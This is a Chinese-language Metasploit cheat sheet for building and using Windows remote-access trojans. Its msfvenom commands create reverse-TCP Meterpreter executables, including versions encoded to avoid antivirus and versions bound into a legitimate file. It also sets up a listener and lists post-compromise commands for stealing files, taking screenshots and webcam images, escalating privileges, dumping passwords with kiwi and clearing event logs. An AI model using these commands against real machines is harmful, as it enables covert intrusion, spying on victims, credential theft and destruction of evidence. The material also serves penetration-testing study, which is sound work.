生成木马
生成自带马
msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=4444 - -f exe -o shell.exe
生成编码马
msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=4444 -e x86/shikata_ga_nai -i 8 -f exe -o shell.exe
生成捆绑马
msfvenom -x "要捆绑的文件" -p windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=4444 -e x86/shikata_ga_nai -i 8 -f exe -o shell.exe
监听模块使用
use exploit/multi/handler
set payload windows/shell/reverse_tcp(set payload windows/meterpreter/reverse_tcp)(两者区别是拿到会话后进入shell还是进入meterpreter)
options
set lhost x.x.x.x
set lport 4444
run
sessions使用
列出会话
sessions
选择会话
sessions -i
返回会话
background
meterpreter常用命令
系统信息 sysinfo
下载文件 download 目标文件 /root
上传文件 upload 本机文件 目标路径
截图 screenshot
拍照 webcam_snap
打开视频 webcam_stream
提权 getsystem
win7提权
ms_2018_8120
列出进程 ps
进程迁移 migrate 目标进程pid
抓取密码
load kiwi
creds_all
命令清除 clearev
参考文章
https://www.anquanke.com/post/id/235631#h3-9